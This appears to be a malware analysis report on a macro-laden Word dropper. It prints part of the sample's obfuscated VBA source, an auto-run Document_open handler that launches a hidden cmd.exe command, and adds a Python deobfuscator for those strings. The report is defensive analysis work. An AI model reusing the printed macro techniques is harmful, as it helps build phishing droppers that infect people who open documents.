Verdict: MALICIOUS
Risk score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious OLE (Word) document carrying VBA macros. The critical OLE_VBA_SHELL heuristic flags a VBA.Shell call in the ThisDocument module, and OLE_VBA_DOCOPEN flags the Document_open handler that issues it, so the command runs as soon as the document is opened with macros enabled; the second Shell() argument is 0 (vbHide), so no console window is shown. The command line is never stored as a literal: Document_open concatenates some thirty identifiers, at least two of which (cvNoiqIv and ZWRCGKEZ, both visible in the preview) are functions in a second module, and those functions assemble their fragments from short string literals and Chr() calls whose arguments are sums of variables that are never assigned. Without Option Explicit those variables are Empty and contribute 0, so Chr(109) is "m", Chr(99) is "c" and Chr(34) is the double quote; the surrounding arithmetic and type conversions on unassigned variables are junk, kept harmless by On Error Resume Next. The fragments visible here yield `%comSpEc%` (the ComSpec variable, which expands to the path of cmd.exe), `CMd /c` and a chain of SET assignments, the environment-variable-substitution obfuscation commonly used by macro droppers to hide the real command. The remainder of the command, including any download URL, lies in functions beyond the preview and is not reconstructed on this page; the dropper classification rests on ClamAV's Doc.Dropper.Agent signature and on the Shell() plus Document_open combination.
Heuristics (5)

- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Dropper.Agent-7152102-0
- OLE_VBA_MACROS (medium, 2 related findings): document contains VBA macro code
- OLE_VBA_SHELL (critical): Shell() call in VBA
- OLE_VBA_DOCOPEN (high): Document_Open macro
- EMBEDDED_URL (info): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
  - http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace identifier carried by embedded Office drawing parts, not a network indicator; it should not be blocked or hunted as a C2 URL.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27016 bytes | d980162399db7de30c3cf1f96dfe1abbd149cebfcd2169dc6c4f3d3699c35e6b |
Script preview (the first 1,000 lines of the extracted script; the listing is truncated below):
Attribute VB_Name = "CnbHrvUltaijFo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function HocDsTTHVuf()
On Error Resume Next
zjYVhm = ChrW(46)
ZpXJMt = ChrB(GzwFd)
QXPkwo = Hex(6756)
KucXYD = Atn(708)
LXiiAY = Oct(UmjdTp)
Dutuki = Chr(KSzzd)
End Function
Private Function JXtijzpKof()
On Error Resume Next
Esvwa = Fix(Qibqsw)
roaYr = IMkrEi
nPuPUj = Hex(IOmzfi)
WwoDR = CStr(izKOI)
End Function
Private Function SbZqjwGbtqi()
On Error Resume Next
MFVHsi = CByte(JAbcE)
wYZPjw = Atn(31542 / WQkjQz * 27414 - 22678)
DhsYi = CInt(66465 + BwvCtT + JNiWWL / mhdMwl)
hGlFm = ChrW(FXfwQt)
jGiOsm = Sgn(5)
bnJLTq = lFRfJ
Orwcra = 2343
End Function
Private Function kUvSiHO()
On Error Resume Next
RIvGFC = dESmPX
wWGYD = MjBch
PvdJzu = Rnd(4372)
juiFFA = ChrW(1436)
clINjj = Chr(fQZUwo)
End Function
Private Function UFIMzaiGPAXQS()
On Error Resume Next
AIbnb = 2
wjTGw = 413068242
vtArM = Cos(kCYPZ)
iZHVa = ChrW(81)
End Function
Private Sub Document_open()
On Error Resume Next
aasAJ = Tan(939)
jTvad = Cos(944)
NdKiFE = WInad
tiXMw = sKRCP
LILiI = Sin(3)
VBA.Shell "" + VhHmzhhouuwX + JjCDzVa + CVar("C") + ztmnCRiwjfmnGT + fwiAfhXDUQJz + cvNoiqIv + ZWRCGKEZ + TsijajOOKW + RszUsmRKJq + iPZYSdbG + NmJEoDfhQa + adQPBkC + iqkizOGVNQ + YFrTBF + UWismKwfr + XMFEt + LBwkLfLFT + ScljJWC + ifijNFLV + SXukAKzl + CNAvaGj + KoLkvBvnGd + zjVsZDmKHIp + BNbwh + lzXMNU + YtikrQ + LrHtzZw + GOaKbhdkiV + VirZozBOP + bJzEvSJ + WwJTRWjSmI + HTicYLzYlUHnj, 0
sDOtkl = CByte(224800985)
End Sub
Private Function uzXYzhkps()
On Error Resume Next
ipFrj = CDate(fjpZfB)
pFZMV = Int(6)
fdiWD = 5
XJmFX = 3979
psmiCb = Sqr(271145631)
KOzUA = Hex(441634975)
End Function
Private Function vujitMzIqkXDM()
On Error Resume Next
OmmiLh = 8
WRjzF = Round(92)
ToFwm = CSng(97)
AjDZu = Round(34456 * ZJTcJF + 19444 * 97925)
XPwtG = fczlY
GYpoa = Oct(AaSwaj)
OFfpw = 80
End Function
Private Function BPqXbasP()
On Error Resume Next
zXZzJN = Chr(mdBoYi)
fkLUBb = FtNOV
IFMOj = CBool(5228)
ArqPYO = CBool(FDfSaJ / ZzKcr)
pVmWj = 5
IYjoi = CInt(PwiCp)
End Function
Attribute VB_Name = "SowcUVL"
Function cvNoiqIv()
On Error Resume Next
nslCB = Atn(1)
RPFLT = Atn(24)
zZYfNHWH = CStr(Chr(dlrJbPWIlXGI + VpUjfwtazj + 109 + RQPivaHdOF + ThHNzYnNRlRJpo)) + "d rloZjw"
vDpOt = CDate(OPhXri)
rcUFc = Hex(8)
IfuzdCKOBBa = "N" + CStr(Chr(sDlHiCz + GcfAWIQSXNwqj + 99 + vMHjwFpHQBk + POQkCUswIN)) + "FaHs fb" + "L" + "HaT" + "SSiE"
BEaYdD = 3060
jVSCFA = BOpIkh
DCwwzTIc = "t" + CStr(Chr(BqSbMPMbKLV + GnRVPwlzw + 109 + wOoLjinz + zPXfDmX)) + "kqEUszC" + "WYOr lv"
nFcTBB = CDate(15108 + jBMcRJ)
kvXdrO = ChrB(RuLXUw + rNnfJB)
ErhGThqL = "i" + CStr(Chr(DsVTvhbb + JiEnJfwaA + 109 + XWjMJYtpLMN + zQautiHCulCZs)) + "SrhXTv & " + " %" + CStr(Chr(AFMWqcfWl + JhlhBvPRntED + 99 + kddkhmQwfp + qYKTtooGVaQNjG)) + "o" + CStr(Chr(oUvCfAFzCmE + MBwbCFrHTz + 109 + aBKMPAbdp + tDUqSLRH)) + "Sp"
zNqpW = CBool(43)
nqfsBr = "E" + CStr(Chr(kIYUlhBRTU + mEzvmnldqjF + 99 + YhOZvCs + pslsiTZLWnpOQP)) + "% /" + CStr(Chr(YiVHiEDiRM + rXScArPGKuJS + 99 + KRAoIRXDXYX + kpDaRTnTw)) + " CMd" + " /" + CStr(Chr(OYAkMiUDD + lhdEiOoAtEbbiR + 99 + rzPKLwmajQ + sDUURpDWwMkYf)) + " " + CStr(Chr(JmzVSFJdDno + uDVRbzHqkHJpO + 34 + fOqfOVdomv + iaQjdGObsrTz)) + " SET " + " lf7W=k" + "& set " + "a5=." + CStr(Chr(lZinjEUlzozIU + PiWGLZPTa + 99 + AJfovtwYjEJw + RwdbjUmuL)) + "o&"
cvNoiqIv = zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr
OzHSA = Chr(NaJJi)
NiKqX = Cos(29315692)
End Function
Function ZWRCGKEZ()
On Error Resume Next
jKTWYLcHiT = "&" + " " + "sET " + " ST" + "F=E" + "@ht"
UuOGRGRR = "&&" + " sET uYf" + "j=o& " + " SeT ut" + "=/&&
... (truncated)
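The Chr() arithmetic and string concatenation seen in cvNoiqIv above can be resolved without ever running the macro. The following Python script is an added example written for this report, not the analyzer's own code: it statically evaluates the string-building subset of VBA (string literals, integer literals, `+`, and the intrinsics Chr/ChrW/ChrB, CStr and CVar), treats every identifier that is never assigned as Empty (0 in arithmetic, "" in concatenation, which is VBA's behaviour without Option Explicit), and skips any statement that raises, mirroring On Error Resume Next. The names `tokenize`, `Parser`, `eval_function`, `decode_module` and `SAMPLE` are this example's; the embedded input is the cvNoiqIv function from the macros.bas preview with its interleaved junk statements abridged to one, and it is not a constructed sample.

```python
import re
# Added example for this report, not the analysis platform's own code: a static
# evaluator for the string-building VBA subset the macro uses.  Any identifier that
# is never assigned is treated as VBA's Empty (0 in arithmetic, "" in concatenation).
TOKEN_RE = re.compile(r'(\d+)|("(?:[^"]|"")*")|([A-Za-z_]\w*)|([+(),])|(\S)')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+)$')
BODY_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Function|Sub)\s+(\w+)[^\n]*\n(.*?)'
                     r'^\s*End\s+(?:Function|Sub)', re.I | re.M | re.S)
BUILTINS = {"chr": lambda a: chr(0 if a is None else a),        # Chr(Empty) is Chr(0)
            "cstr": lambda a: "" if a is None else str(a), "cvar": lambda a: a}
BUILTINS["chrw"] = BUILTINS["chrb"] = BUILTINS["chr"]           # any other call raises KeyError

def tokenize(src):
    """(kind, value) tokens; only '+' ( ) , are accepted, so a statement using any other
    operator raises and is skipped, which is what VBA does under On Error Resume Next."""
    toks = []
    for num, string, ident, op, bad in TOKEN_RE.findall(src):
        if bad:
            raise SyntaxError(bad)
        toks.append(("num", int(num)) if num else ("str", string[1:-1].replace('""', '"'))
                    if string else ("id", ident) if ident else ("op", op))
    return toks

def vba_add(a, b):
    """VBA '+': Empty (None) is the identity, strings concatenate, integers add."""
    if a is None or b is None:
        return a if b is None else b
    if type(a) is not type(b) or not isinstance(a, (str, int)):
        raise TypeError("type mismatch")                        # VBA runtime error 13
    return a + b

class Parser:
    """expr := atom ('+' atom)*; atom := literal | name | name '(' [expr {',' expr}] ')'."""
    def __init__(self, toks, env, funcs):
        self.toks, self.i, self.env, self.funcs = toks + [("end", None)], 0, env, funcs

    def expr(self):
        val = self.atom()
        while self.toks[self.i] == ("op", "+"):
            self.i += 1
            val = vba_add(val, self.atom())
        return val

    def atom(self):
        kind, val = self.toks[self.i]
        self.i += 1
        if kind in ("num", "str"):
            return val
        if kind != "id":
            raise SyntaxError(f"unexpected {val!r}")
        args = None
        if self.toks[self.i] == ("op", "("):                    # argument list
            self.i += 1
            args = [] if self.toks[self.i] == ("op", ")") else [self.expr()]
            while self.toks[self.i] == ("op", ","):
                self.i += 1
                args.append(self.expr())
            if self.toks[self.i] != ("op", ")"):
                raise SyntaxError("expected ')'")
            self.i += 1
        if val in self.funcs:                                   # call to another macro function
            return eval_function(val, self.funcs)
        return self.env.get(val) if args is None else BUILTINS[val.lower()](*args)

def eval_function(name, funcs):
    """Run a function's assignments in order, skipping any that raise (On Error Resume
    Next), and return whatever was assigned to the function's own name (its result)."""
    env = {}
    for line in funcs[name]:
        m = ASSIGN_RE.match(line)
        if m:
            try:
                env[m.group(1)] = Parser(tokenize(m.group(2)), env, funcs).expr()
            except Exception:
                pass
    return env.get(name)

def decode_module(module_src):
    """{function name: decoded string} for every Function/Sub whose result is a string."""
    funcs = {name: body.splitlines() for name, body in BODY_RE.findall(module_src)}
    values = {name: eval_function(name, funcs) for name in funcs}
    return {name: val for name, val in values.items() if isinstance(val, str)}

# Input: the string-building lines of cvNoiqIv copied from the macros.bas preview above
# (module SowcUVL), with the interleaved junk statements abridged to one.
SAMPLE = r'''
Function cvNoiqIv()
On Error Resume Next
nslCB = Atn(1)
zZYfNHWH = CStr(Chr(dlrJbPWIlXGI + VpUjfwtazj + 109 + RQPivaHdOF + ThHNzYnNRlRJpo)) + "d rloZjw"
IfuzdCKOBBa = "N" + CStr(Chr(sDlHiCz + GcfAWIQSXNwqj + 99 + vMHjwFpHQBk + POQkCUswIN)) + "FaHs fb" + "L" + "HaT" + "SSiE"
DCwwzTIc = "t" + CStr(Chr(BqSbMPMbKLV + GnRVPwlzw + 109 + wOoLjinz + zPXfDmX)) + "kqEUszC" + "WYOr lv"
ErhGThqL = "i" + CStr(Chr(DsVTvhbb + JiEnJfwaA + 109 + XWjMJYtpLMN + zQautiHCulCZs)) + "SrhXTv & " + " %" + CStr(Chr(AFMWqcfWl + JhlhBvPRntED + 99 + kddkhmQwfp + qYKTtooGVaQNjG)) + "o" + CStr(Chr(oUvCfAFzCmE + MBwbCFrHTz + 109 + aBKMPAbdp + tDUqSLRH)) + "Sp"
nqfsBr = "E" + CStr(Chr(kIYUlhBRTU + mEzvmnldqjF + 99 + YhOZvCs + pslsiTZLWnpOQP)) + "% /" + CStr(Chr(YiVHiEDiRM + rXScArPGKuJS + 99 + KRAoIRXDXYX + kpDaRTnTw)) + " CMd" + " /" + CStr(Chr(OYAkMiUDD + lhdEiOoAtEbbiR + 99 + rzPKLwmajQ + sDUURpDWwMkYf)) + " " + CStr(Chr(JmzVSFJdDno + uDVRbzHqkHJpO + 34 + fOqfOVdomv + iaQjdGObsrTz)) + " SET " + " lf7W=k" + "& set " + "a5=." + CStr(Chr(lZinjEUlzozIU + PiWGLZPTa + 99 + AJfovtwYjEJw + RwdbjUmuL)) + "o&"
cvNoiqIv = zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr
End Function
'''
```

`decode_module(SAMPLE)` returns `{'cvNoiqIv': 'md rloZjwNcFaHs fbLHaTSSiEtmkqEUszCWYOr lvimSrhXTv &  %comSpEc% /c CMd /c " SET  lf7W=k& set a5=.co&'}`. The `CVar("C")` that precedes cvNoiqIv in the Shell() argument turns the leading `md rloZjw` into `Cmd rloZjw`, the junk words that follow are arguments cmd.exe ignores, and after the `&` the real work starts: `%comSpEc%` expands to the cmd.exe path, and `CMd /c " SET lf7W=k& set a5=.co& ...` opens the chain of environment-variable assignments whose substrings are later substituted back into the hidden command. Feeding the full macros.bas (rather than the abridged preview) to `decode_module` resolves the other builder functions referenced by the Shell() call in the same way; a function that uses constructs outside this subset is simply omitted from the result rather than guessed, and the truncated ZWRCGKEZ in the preview would be omitted for that reason.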